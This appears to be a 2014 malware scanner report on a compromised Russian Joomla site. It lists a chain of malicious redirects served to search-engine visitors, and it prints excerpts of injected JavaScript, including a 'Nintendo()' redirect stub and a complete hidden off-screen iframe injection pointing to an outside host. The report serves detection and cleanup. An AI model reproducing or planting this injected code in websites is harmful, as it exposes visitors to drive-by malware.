New scan:

Malware Scanner report for kartexpert.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://alfsystem.com.my/includes/domit/1.php
442 websites infected. alfsystem.com.my is marked by Yandex as suspicious.
->http://www.csra.de/includes/domit/1.php
346 websites infected.
->http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
56 websites infected.
->http://google.ru
42 websites infected.

The website "kartexpert.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://kartexpert.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: kartexpert.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 26 Jun 2014 18:53:10 GMT
Location: http://alfsystem.com.my/includes/domit/1.php
Server: Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.3.27
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from turbine6.ht-systems.ru
X-Cache-Lookup: MISS from turbine6.ht-systems.ru:6666
X-Powered-By: PHP/5.3.27
malicious
URL: http://alfsystem.com.my/includes/domit/1.php
(imitation of visitor from search engine)

GET /includes/domit/1.php HTTP/1.1
Host: alfsystem.com.my
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 26 Jun 2014 18:53:10 GMT
Location: http://www.csra.de/includes/domit/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.23
malicious
URL: http://www.csra.de/includes/domit/1.php
(imitation of visitor from search engine)

GET /includes/domit/1.php HTTP/1.1
Host: www.csra.de
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 26 Jun 2014 18:53:11 GMT
Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.29
malicious
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
(imitation of visitor from search engine)

GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
Host: jbtconsultinggroup.com
Referer: http://www.google.com/search?q=redirect+check4
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 26 Jun 2014 18:53:11 GMT
Location: http://google.ru
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://kartexpert.ru/
200 OK
Content-Length: 51018
Content-Type: text/html
clean
http://kartexpert.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 97281
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Nintendo() {
var g = navigator.userAgent;
var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph
... 99638 bytes are skipped ...
t);return this;},inject:function(element){document.id(element,true).appendChild(this.toElement());
return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>");
return eval(rs);};})();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://kartexpert.ru/media/system/js/core.js
200 OK
Content-Length: 5703
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Nintendo() {
var g = navigator.userAgent;
var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph
... 4805 bytes are skipped ...
on tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)};
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://kartexpert.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 239248
Content-Type: text/javascript
clean
http://kartexpert.ru/media/system/js/caption.js
200 OK
Content-Length: 1648
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Nintendo() {
var g = navigator.userAgent;
var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph
... 527 bytes are skipped ...
tAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/core.js
200 OK
Content-Length: 6804
Content-Type: text/javascript
clean
http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/menu/mega.js
200 OK
Content-Length: 17179
Content-Type: text/javascript
clean
http://kartexpert.ru/modules/mod_news_pro_gk4/interface/scripts/engine.js
200 OK
Content-Length: 8523
Content-Type: text/javascript
clean
http://kartexpert.ru/media/system/js/modal.js
200 OK
Content-Length: 10474
Content-Type: text/javascript
clean
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/mootools_slimbox/slimbox-1.71a/js/slimbox.js
200 OK
Content-Length: 4627
Content-Type: text/javascript
clean
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/behaviour.js
200 OK
Content-Length: 1524
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var SIGProHelper = {
ieBrowserDetect: function(){
if(!document.getElementsByTagName) return false;
if(!document.getElementById) return false;
var bodyClass = document.getElementsByTagName("body")[0].className;
var isIE6 = navigator.userAgent.toLowerCase().indexOf('msie 6') != -1;
var isIE7 = navigator.userAgent.toLowerCase().indexOf('msie 7') != -1;
var isIE8 = navigator.userAgent.toLowerCase().indexOf('msie 8') != -1;
if(isIE6) document.getElements
... 318 bytes are skipped ...
dow.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
if (oldonload) {
oldonload();
}
func();
}
}
}
};
SIGProHelper.loader(SIGProHelper.ieBrowserDetect);
;;;;;;;document.write('<iframe src="http://juke.erstehilfe.ch/oaczz.ixVedwC6jZ?default" name="Hemoner" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');

Antivirus reports:

Avast
JS:Iframe-DLL [Trj]
Kaspersky
HEUR:Trojan.Script.Generic

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js
200 OK
Content-Length: 1000
Content-Type: text/javascript
clean
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js
200 OK
Content-Length: 10432
Content-Type: text/javascript
clean
http://counter.rambler.ru/top100.jcn?2833107
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kartexpert.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kartexpert.ru/

Result: kartexpert.ru is not infected or malware details are not published yet.